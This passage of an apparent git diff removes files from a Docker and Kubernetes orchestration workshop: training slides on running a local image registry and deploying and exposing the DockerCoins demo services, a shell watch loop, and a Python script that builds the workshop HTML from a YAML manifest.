- We can view the logs of multiple pods by specifying a *selector*
|
||||
|
||||
- A selector is a logic expression using *labels*
|
||||
|
||||
- Conveniently, when you `kubectl run somename`, the associated objects have a `run=somename` label
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the last line of log from all pods with the `run=pingpong` label:
|
||||
```bash
|
||||
kubectl logs -l run=pingpong --tail 1
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Unfortunately, `--follow` cannot (yet) be used to stream the logs from multiple containers.
|
||||
|
||||
---
|
||||
|
||||
class: title
|
||||
|
||||
.small[
|
||||
Meanwhile, at the Google NOC ...
|
||||
|
||||
.small[
|
||||
Why the hell
|
||||
<br/>
|
||||
are we getting 1000 packets per second
|
||||
<br/>
|
||||
of ICMP ECHO traffic from EC2 ?!?
|
||||
]
|
||||
]
|
||||
@@ -1,5 +0,0 @@
|
||||
#!/bin/sh
|
||||
while true; do
|
||||
find . |
|
||||
entr -d . sh -c "DEBUG=1 ./markmaker.py < kube.yml > workshop.md"
|
||||
done
|
||||
@@ -1,92 +0,0 @@
|
||||
#!/usr/bin/env python
|
||||
# transforms a YAML manifest into a HTML workshop file
|
||||
|
||||
import glob
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
|
||||
if os.environ.get("DEBUG") == "1":
|
||||
logging.basicConfig(level=logging.DEBUG)
|
||||
|
||||
|
||||
class InvalidChapter(ValueError):
|
||||
|
||||
def __init__(self, chapter):
|
||||
ValueError.__init__(self, "Invalid chapter: {!r}".format(chapter))
|
||||
|
||||
|
||||
def generatefromyaml(manifest):
|
||||
manifest = yaml.load(manifest)
|
||||
|
||||
markdown, titles = processchapter(manifest["chapters"], "<inline>")
|
||||
logging.debug(titles)
|
||||
toc = gentoc(titles)
|
||||
markdown = markdown.replace("@@TOC@@", toc)
|
||||
|
||||
exclude = manifest.get("exclude", [])
|
||||
logging.debug("exclude={!r}".format(exclude))
|
||||
if not exclude:
|
||||
logging.warning("'exclude' is empty.")
|
||||
exclude = ",".join('"{}"'.format(c) for c in exclude)
|
||||
|
||||
html = open("workshop.html").read()
|
||||
html = html.replace("@@MARKDOWN@@", markdown)
|
||||
html = html.replace("@@EXCLUDE@@", exclude)
|
||||
html = html.replace("@@CHAT@@", manifest["chat"])
|
||||
return html
|
||||
|
||||
|
||||
def gentoc(titles, depth=0, chapter=0):
|
||||
if not titles:
|
||||
return ""
|
||||
if isinstance(titles, str):
|
||||
return " "*(depth-2) + "- " + titles + "\n"
|
||||
if isinstance(titles, list):
|
||||
if depth==0:
|
||||
sep = "\n\n<!-- auto-generated TOC -->\n---\n\n"
|
||||
head = ""
|
||||
tail = ""
|
||||
elif depth==1:
|
||||
sep = "\n"
|
||||
head = "## Chapter {}\n\n".format(chapter)
|
||||
tail = ""
|
||||
else:
|
||||
sep = "\n"
|
||||
head = ""
|
||||
tail = ""
|
||||
return head + sep.join(gentoc(t, depth+1, c+1) for (c,t) in enumerate(titles)) + tail
|
||||
|
||||
|
||||
# Arguments:
|
||||
# - `chapter` is a string; if it has multiple lines, it will be used as
|
||||
# a markdown fragment; otherwise it will be considered as a file name
|
||||
# to be recursively loaded and parsed
|
||||
# - `filename` is the name of the file that we're currently processing
|
||||
# (to generate inline comments to facilitate edition)
|
||||
# Returns: (epxandedmarkdown,[list of titles])
|
||||
# The list of titles can be nested.
|
||||
def processchapter(chapter, filename):
|
||||
if isinstance(chapter, unicode):
|
||||
return processchapter(chapter.encode("utf-8"), filename)
|
||||
if isinstance(chapter, str):
|
||||
if "\n" in chapter:
|
||||
titles = re.findall("^# (.*)", chapter, re.MULTILINE)
|
||||
slidefooter = "<!-- {} -->".format(filename)
|
||||
chapter = chapter.replace("\n---\n", "\n{}\n---\n".format(slidefooter))
|
||||
chapter += "\n" + slidefooter
|
||||
return (chapter, titles)
|
||||
if os.path.isfile(chapter):
|
||||
return processchapter(open(chapter).read(), chapter)
|
||||
if isinstance(chapter, list):
|
||||
chapters = [processchapter(c, filename) for c in chapter]
|
||||
markdown = "\n---\n".join(c[0] for c in chapters)
|
||||
titles = [t for (m,t) in chapters if t]
|
||||
return (markdown, titles)
|
||||
raise InvalidChapter(chapter)
|
||||
|
||||
|
||||
sys.stdout.write(generatefromyaml(sys.stdin))
|
||||
@@ -1,348 +0,0 @@
|
||||
class: title
|
||||
|
||||
Our app on Kube
|
||||
|
||||
---
|
||||
|
||||
## What's on the menu?
|
||||
|
||||
In this part, we will:
|
||||
|
||||
- **build** images for our app,
|
||||
|
||||
- **ship** these images with a registry,
|
||||
|
||||
- **run** deployments using these images,
|
||||
|
||||
- expose these deployments so they can communicate with each other,
|
||||
|
||||
- expose the web UI so we can access it from outside.
|
||||
|
||||
---
|
||||
|
||||
## The plan
|
||||
|
||||
- Build on our control node (`node1`)
|
||||
|
||||
- Tag images so that they are named `$REGISTRY/servicename`
|
||||
|
||||
- Upload them to a registry
|
||||
|
||||
- Create deployments using the images
|
||||
|
||||
- Expose (with a ClusterIP) the services that need to communicate
|
||||
|
||||
- Expose (with a NodePort) the WebUI
|
||||
|
||||
---
|
||||
|
||||
## Which registry do we want to use?
|
||||
|
||||
- We could use the Docker Hub
|
||||
|
||||
- Or a service offered by our cloud provider (GCR, ECR...)
|
||||
|
||||
- Or we could just self-host that registry
|
||||
|
||||
*We'll self-host the registry because it's the most generic solution for this workshop.*
|
||||
|
||||
---
|
||||
|
||||
## Using the open source registry
|
||||
|
||||
- We need to run a `registry:2` container
|
||||
<br/>(make sure you specify tag `:2` to run the new version!)
|
||||
|
||||
- It will store images and layers to the local filesystem
|
||||
<br/>(but you can add a config file to use S3, Swift, etc.)
|
||||
|
||||
- Docker *requires* TLS when communicating with the registry
|
||||
|
||||
- unless for registries on `127.0.0.0/8` (i.e. `localhost`)
|
||||
|
||||
- or with the Engine flag `--insecure-registry`
|
||||
|
||||
- Our strategy: publish the registry container on a NodePort,
|
||||
<br/>so that it's available through `127.0.0.1:xxxxx` on each node
|
||||
|
||||
---
|
||||
|
||||
# Deploying a self-hosted registry
|
||||
|
||||
- We will deploy a registry container, and expose it with a NodePort
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the registry service:
|
||||
```bash
|
||||
kubectl run registry --image=registry:2
|
||||
```
|
||||
|
||||
- Expose it on a NodePort:
|
||||
```bash
|
||||
kubectl expose deploy/registry --port=5000 --type=NodePort
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to our registry
|
||||
|
||||
- We need to find out which port has been allocated
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the service details:
|
||||
```bash
|
||||
kubectl describe svc/registry
|
||||
```
|
||||
|
||||
- Get the port number programmatically:
|
||||
```bash
|
||||
NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
|
||||
REGISTRY=127.0.0.1:$NODEPORT
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our registry
|
||||
|
||||
- A convenient Docker registry API route to remember is `/v2/_catalog`
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the repositories currently held in our registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should see:
|
||||
```json
|
||||
{"repositories":[]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox $REGISTRY/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push $REGISTRY/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking again what's on our local registry
|
||||
|
||||
- Let's use the same endpoint as before
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
{"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Building and pushing our images
|
||||
|
||||
- We are going to use a convenient feature of Docker Compose
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Build and push the images:
|
||||
```bash
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
rng:
|
||||
build: dockercoins/rng
|
||||
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
|
||||
deploy:
|
||||
mode: global
|
||||
...
|
||||
redis:
|
||||
image: redis
|
||||
...
|
||||
worker:
|
||||
build: dockercoins/worker
|
||||
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
|
||||
...
|
||||
deploy:
|
||||
replicas: 10
|
||||
```
|
||||
|
||||
.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]
|
||||
|
||||
---
|
||||
|
||||
## Deploying all the things
|
||||
|
||||
- We can now deploy our code (as well as a redis instance)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy `redis`:
|
||||
```bash
|
||||
kubectl run redis --image=redis
|
||||
```
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl run $SERVICE --image=$REGISTRY/$SERVICE
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is this working?
|
||||
|
||||
- After waiting for the deployment to complete, let's look at the logs!
|
||||
|
||||
(Hint: use `kubectl get deploy -w` to watch deployment events)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at some logs:
|
||||
```bash
|
||||
kubectl logs deploy/rng
|
||||
kubectl logs deploy/worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
🤔 `rng` is fine ... But not `worker`.
|
||||
|
||||
--
|
||||
|
||||
💡 Oh right! We forgot to `expose`.
|
||||
|
||||
---
|
||||
|
||||
# Exposing services internally
|
||||
|
||||
- Three deployments need to be reachable by others: `hasher`, `redis`, `rng`
|
||||
|
||||
- `worker` doesn't need to be exposed
|
||||
|
||||
- `webui` will be dealt with later
|
||||
|
||||
.exercise[
|
||||
|
||||
- Expose each deployment, specifying the right port:
|
||||
```bash
|
||||
kubectl expose deployment redis --port 6379
|
||||
kubectl expose deployment rng --port 80
|
||||
kubectl expose deployment hasher --port 80
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is this working yet?
|
||||
|
||||
- The `worker` has an infinite loop, that retries 10 seconds after an error
|
||||
|
||||
.exercise[
|
||||
|
||||
- Stream the worker's logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --follow
|
||||
```
|
||||
|
||||
(Give it about 10 seconds to recover)
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should now see the `worker`, well, working happily.
|
||||
|
||||
---
|
||||
|
||||
# Exposing services for external access
|
||||
|
||||
- Now we would like to access the Web UI
|
||||
|
||||
- We will expose it with a `NodePort`
|
||||
|
||||
(just like we did for the registry)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a `NodePort` service for the Web UI:
|
||||
```bash
|
||||
kubectl expose deploy/webui --type=NodePort --port=80
|
||||
```
|
||||
|
||||
- Check the port that was allocated:
|
||||
```bash
|
||||
kubectl get svc
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Accessing the web UI
|
||||
|
||||
- We can now connect to *any node*, on the allocated node port, to view the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Open the web UI in your browser (http://node-ip-address:3xxxx/)
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*Alright, we're back to where we started, when we were running on a single node!*
|
||||
@@ -1,976 +0,0 @@
|
||||
class: title
|
||||
|
||||
Our app on Swarm
|
||||
|
||||
---
|
||||
|
||||
## What's on the menu?
|
||||
|
||||
In this part, we will:
|
||||
|
||||
- **build** images for our app,
|
||||
|
||||
- **ship** these images with a registry,
|
||||
|
||||
- **run** services using these images.
|
||||
|
||||
---
|
||||
|
||||
## Why do we need to ship our images?
|
||||
|
||||
- When we do `docker-compose up`, images are built for our services
|
||||
|
||||
- These images are present only on the local node
|
||||
|
||||
- We need these images to be distributed on the whole Swarm
|
||||
|
||||
- The easiest way to achieve that is to use a Docker registry
|
||||
|
||||
- Once our images are on a registry, we can reference them when
|
||||
creating our services
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Build, ship, and run, for a single service
|
||||
|
||||
If we had only one service (built from a `Dockerfile` in the
|
||||
current directory), our workflow could look like this:
|
||||
|
||||
```
|
||||
docker build -t jpetazzo/doublerainbow:v0.1 .
|
||||
docker push jpetazzo/doublerainbow:v0.1
|
||||
docker service create jpetazzo/doublerainbow:v0.1
|
||||
```
|
||||
|
||||
We just have to adapt this to our application, which has 4 services!
|
||||
|
||||
---
|
||||
|
||||
## The plan
|
||||
|
||||
- Build on our local node (`node1`)
|
||||
|
||||
- Tag images so that they are named `localhost:5000/servicename`
|
||||
|
||||
- Upload them to a registry
|
||||
|
||||
- Create services using the images
|
||||
|
||||
---
|
||||
|
||||
## Which registry do we want to use?
|
||||
|
||||
.small[
|
||||
|
||||
- **Docker Hub**
|
||||
|
||||
- hosted by Docker Inc.
|
||||
- requires an account (free, no credit card needed)
|
||||
- images will be public (unless you pay)
|
||||
- located in AWS EC2 us-east-1
|
||||
|
||||
- **Docker Trusted Registry**
|
||||
|
||||
- self-hosted commercial product
|
||||
- requires a subscription (free 30-day trial available)
|
||||
- images can be public or private
|
||||
- located wherever you want
|
||||
|
||||
- **Docker open source registry**
|
||||
|
||||
- self-hosted barebones repository hosting
|
||||
- doesn't require anything
|
||||
- doesn't come with anything either
|
||||
- located wherever you want
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using Docker Hub
|
||||
|
||||
*If we wanted to use the Docker Hub...*
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^{
|
||||
```
|
||||
-->
|
||||
|
||||
- We would log into the Docker Hub:
|
||||
```bash
|
||||
docker login
|
||||
```
|
||||
|
||||
- And in the following slides, we would use our Docker Hub login
|
||||
(e.g. `jpetazzo`) instead of the registry address (i.e. `127.0.0.1:5000`)
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^}
|
||||
```
|
||||
-->
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using Docker Trusted Registry
|
||||
|
||||
*If we wanted to use DTR, we would...*
|
||||
|
||||
- Make sure we have a Docker Hub account
|
||||
|
||||
- [Activate a Docker Datacenter subscription](
|
||||
https://hub.docker.com/enterprise/trial/)
|
||||
|
||||
- Install DTR on our machines
|
||||
|
||||
- Use `dtraddress:port/user` instead of the registry address
|
||||
|
||||
*This is out of the scope of this workshop!*
|
||||
|
||||
---
|
||||
|
||||
## Using the open source registry
|
||||
|
||||
- We need to run a `registry:2` container
|
||||
<br/>(make sure you specify tag `:2` to run the new version!)
|
||||
|
||||
- It will store images and layers to the local filesystem
|
||||
<br/>(but you can add a config file to use S3, Swift, etc.)
|
||||
|
||||
- Docker *requires* TLS when communicating with the registry
|
||||
|
||||
- unless for registries on `127.0.0.0/8` (i.e. `localhost`)
|
||||
|
||||
- or with the Engine flag `--insecure-registry`
|
||||
|
||||
<!-- -->
|
||||
|
||||
- Our strategy: publish the registry container on port 5000,
|
||||
<br/>so that it's available through `127.0.0.1:5000` on each node
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Deploying a local registry
|
||||
|
||||
- We will create a single-instance service, publishing its port
|
||||
on the whole cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the registry service:
|
||||
```bash
|
||||
docker service create --name registry --publish 5000:5000 registry:2
|
||||
```
|
||||
|
||||
- Now try the following command; it should return `{"repositories":[]}`:
|
||||
```bash
|
||||
curl 127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
(If that doesn't work, wait a few seconds and try again.)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Checking what's on our local registry
|
||||
|
||||
- The registry API has endpoints to query what's there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl http://127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
{"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Build, tag, and push our application container images
|
||||
|
||||
- Compose has named our images `dockercoins_XXX` for each service
|
||||
|
||||
- We need to retag them (to `127.0.0.1:5000/XXX:v1`) and push them
|
||||
|
||||
.exercise[
|
||||
|
||||
- Set `REGISTRY` and `TAG` environment variables to use our local registry
|
||||
- And run this little for loop:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
REGISTRY=127.0.0.1:5000 TAG=v1
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
docker tag dockercoins_$SERVICE $REGISTRY/$SERVICE:$TAG
|
||||
docker push $REGISTRY/$SERVICE
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Overlay networks
|
||||
|
||||
- SwarmKit integrates with overlay networks
|
||||
|
||||
- Networks are created with `docker network create`
|
||||
|
||||
- Make sure to specify that you want an *overlay* network
|
||||
<br/>(otherwise you will get a local *bridge* network by default)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create an overlay network for our application:
|
||||
```bash
|
||||
docker network create --driver overlay dockercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Viewing existing networks
|
||||
|
||||
- Let's confirm that our network was created
|
||||
|
||||
.exercise[
|
||||
|
||||
- List existing networks:
|
||||
```bash
|
||||
docker network ls
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Can you spot the differences?
|
||||
|
||||
The networks `dockercoins` and `ingress` are different from the other ones.
|
||||
|
||||
Can you see how?
|
||||
|
||||
--
|
||||
|
||||
class: manual-btp
|
||||
|
||||
- They are using a different kind of ID, reflecting the fact that they
|
||||
are SwarmKit objects instead of "classic" Docker Engine objects.
|
||||
|
||||
- Their *scope* is `swarm` instead of `local`.
|
||||
|
||||
- They are using the overlay driver.
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp, extra-details
|
||||
|
||||
## Caveats
|
||||
|
||||
.warning[In Docker 1.12, you cannot join an overlay network with `docker run --net ...`.]
|
||||
|
||||
Starting with version 1.13, you can, if the network was created with the `--attachable` flag.
|
||||
|
||||
*Why is that?*
|
||||
|
||||
Placing a container on a network requires allocating an IP address for this container.
|
||||
|
||||
The allocation must be done by a manager node (worker nodes cannot update Raft data).
|
||||
|
||||
As a result, `docker run --net ...` requires collaboration with manager nodes.
|
||||
|
||||
It alters the code path for `docker run`, so it is allowed only under strict circumstances.
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Run the application
|
||||
|
||||
- First, create the `redis` service; that one is using a Docker Hub image
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the `redis` service:
|
||||
```bash
|
||||
docker service create --network dockercoins --name redis redis
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Run the other services
|
||||
|
||||
- Then, start the other services one by one
|
||||
|
||||
- We will use the images pushed previously
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start the other services:
|
||||
```bash
|
||||
REGISTRY=127.0.0.1:5000
|
||||
TAG=v1
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
docker service create --network dockercoins --detach=true \
|
||||
--name $SERVICE $REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
???
|
||||
|
||||
## Wait for our application to be up
|
||||
|
||||
- We will see later a way to watch progress for all the tasks of the cluster
|
||||
|
||||
- But for now, a scrappy Shell loop will do the trick
|
||||
|
||||
.exercise[
|
||||
|
||||
- Repeatedly display the status of all our services:
|
||||
```bash
|
||||
watch "docker service ls -q | xargs -n1 docker service ps"
|
||||
```
|
||||
|
||||
- Stop it once everything is running
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Expose our application web UI
|
||||
|
||||
- We need to connect to the `webui` service, but it is not publishing any port
|
||||
|
||||
- Let's reconfigure it to publish a port
|
||||
|
||||
.exercise[
|
||||
|
||||
- Update `webui` so that we can connect to it from outside:
|
||||
```bash
|
||||
docker service update webui --publish-add 8000:80 --detach=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: to "de-publish" a port, you would have to specify the container port.
|
||||
</br>(i.e. in that case, `--publish-rm 80`)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## What happens when we modify a service?
|
||||
|
||||
- Let's find out what happened to our `webui` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at the tasks and containers associated to `webui`:
|
||||
```bash
|
||||
docker service ps webui
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
class: manual-btp
|
||||
|
||||
The first version of the service (the one that was not exposed) has been shutdown.
|
||||
|
||||
It has been replaced by the new version, with port 80 accessible from outside.
|
||||
|
||||
(This will be discussed with more details in the section about stateful services.)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Connect to the web UI
|
||||
|
||||
- The web UI is now available on port 8000, *on all the nodes of the cluster*
|
||||
|
||||
.exercise[
|
||||
|
||||
- If you're using Play-With-Docker, just click on the `(8000)` badge
|
||||
|
||||
- Otherwise, point your browser to any node, on port 8000
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Scaling the application
|
||||
|
||||
- We can change scaling parameters with `docker update` as well
|
||||
|
||||
- We will do the equivalent of `docker-compose scale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Bring up more workers:
|
||||
```bash
|
||||
docker service update worker --replicas 10 --detach=false
|
||||
```
|
||||
|
||||
- Check the result in the web UI
|
||||
|
||||
]
|
||||
|
||||
You should see the performance peaking at 10 hashes/s (like before).
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Global scheduling
|
||||
|
||||
- We want to utilize as best as we can the entropy generators
|
||||
on our nodes
|
||||
|
||||
- We want to run exactly one `rng` instance per node
|
||||
|
||||
- SwarmKit has a special scheduling mode for that, let's use it
|
||||
|
||||
- We cannot enable/disable global scheduling on an existing service
|
||||
|
||||
- We have to destroy and re-create the `rng` service
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Scaling the `rng` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the existing `rng` service:
|
||||
```bash
|
||||
docker service rm rng
|
||||
```
|
||||
|
||||
- Re-create the `rng` service with *global scheduling*:
|
||||
```bash
|
||||
docker service create --name rng --network dockercoins --mode global \
|
||||
--detach=false $REGISTRY/rng:$TAG
|
||||
```
|
||||
|
||||
- Look at the result in the web UI
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details, manual-btp
|
||||
|
||||
## Why do we have to re-create the service to enable global scheduling?
|
||||
|
||||
- Enabling it dynamically would make rolling updates semantics very complex
|
||||
|
||||
- This might change in the future (after all, it was possible in 1.12 RC!)
|
||||
|
||||
- As of Docker Engine 17.05, other parameters requiring to `rm`/`create` the service are:
|
||||
|
||||
- service name
|
||||
|
||||
- hostname
|
||||
|
||||
- network
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## How did we make our app "Swarm-ready"?
|
||||
|
||||
This app was written in June 2015. (One year before Swarm mode was released.)
|
||||
|
||||
What did we change to make it compatible with Swarm mode?
|
||||
|
||||
--
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the app directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
```
|
||||
|
||||
- See modifications in the code:
|
||||
```bash
|
||||
git log -p --since "4-JUL-2015" -- . ':!*.yml*' ':!*.html'
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## What did we change in our app since its inception?
|
||||
|
||||
- Compose files
|
||||
|
||||
- HTML file (it contains an embedded contextual tweet)
|
||||
|
||||
- Dockerfiles (to switch to smaller images)
|
||||
|
||||
- That's it!
|
||||
|
||||
--
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
*We didn't change a single line of code in this app since it was written.*
|
||||
|
||||
--
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
*The images that were [built in June 2015](
|
||||
https://hub.docker.com/r/jpetazzo/dockercoins_worker/tags/)
|
||||
(when the app was written) can still run today ...
|
||||
<br/>... in Swarm mode (distributed across a cluster, with load balancing) ...
|
||||
<br/>... without any modification.*
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## How did we design our app in the first place?
|
||||
|
||||
- [Twelve-Factor App](https://12factor.net/) principles
|
||||
|
||||
- Service discovery using DNS names
|
||||
|
||||
- Initially implemented as "links"
|
||||
|
||||
- Then "ambassadors"
|
||||
|
||||
- And now "services"
|
||||
|
||||
- Existing apps might require more changes!
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Integration with Compose
|
||||
|
||||
- The previous section showed us how to streamline image build and push
|
||||
|
||||
- We will now see how to streamline service creation
|
||||
|
||||
(i.e. get rid of the `for SERVICE in ...; do docker service create ...` part)
|
||||
|
||||
---
|
||||
|
||||
## Compose file version 3
|
||||
|
||||
(New in Docker Engine 1.13)
|
||||
|
||||
- Almost identical to version 2
|
||||
|
||||
- Can be directly used by a Swarm cluster through `docker stack ...` commands
|
||||
|
||||
- Introduces a `deploy` section to pass Swarm-specific parameters
|
||||
|
||||
- Resource limits are moved to this `deploy` section
|
||||
|
||||
- See [here](https://github.com/aanand/docker.github.io/blob/8524552f99e5b58452fcb1403e1c273385988b71/compose/compose-file.md#upgrading) for the complete list of changes
|
||||
|
||||
- Supersedes *Distributed Application Bundles*
|
||||
|
||||
(JSON payload describing an application; could be generated from a Compose file)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Removing everything
|
||||
|
||||
- Before deploying using "stacks," let's get a clean slate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove *all* the services:
|
||||
```bash
|
||||
docker service ls -q | xargs docker service rm
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Our first stack
|
||||
|
||||
We need a registry to move images around.
|
||||
|
||||
Without a stack file, it would be deployed with the following command:
|
||||
|
||||
```bash
|
||||
docker service create --publish 5000:5000 registry:2
|
||||
```
|
||||
|
||||
Now, we are going to deploy it with the following stack file:
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
registry:
|
||||
image: registry:2
|
||||
ports:
|
||||
- "5000:5000"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Checking our stack files
|
||||
|
||||
- All the stack files that we will use are in the `stacks` directory
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Check `registry.yml`:
|
||||
```bash
|
||||
cat registry.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying our first stack
|
||||
|
||||
- All stack manipulation commands start with `docker stack`
|
||||
|
||||
- Under the hood, they map to `docker service` commands
|
||||
|
||||
- Stacks have a *name* (which also serves as a namespace)
|
||||
|
||||
- Stacks are specified with the aforementioned Compose file format version 3
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy our local registry:
|
||||
```bash
|
||||
docker stack deploy registry --compose-file registry.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Inspecting stacks
|
||||
|
||||
- `docker stack ps` shows the detailed state of all services of a stack
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our registry is running correctly:
|
||||
```bash
|
||||
docker stack ps registry
|
||||
```
|
||||
|
||||
- Confirm that we get the same output with the following command:
|
||||
```bash
|
||||
docker service ps registry_registry
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Specifics of stack deployment
|
||||
|
||||
Our registry is not *exactly* identical to the one deployed with `docker service create`!
|
||||
|
||||
- Each stack gets its own overlay network
|
||||
|
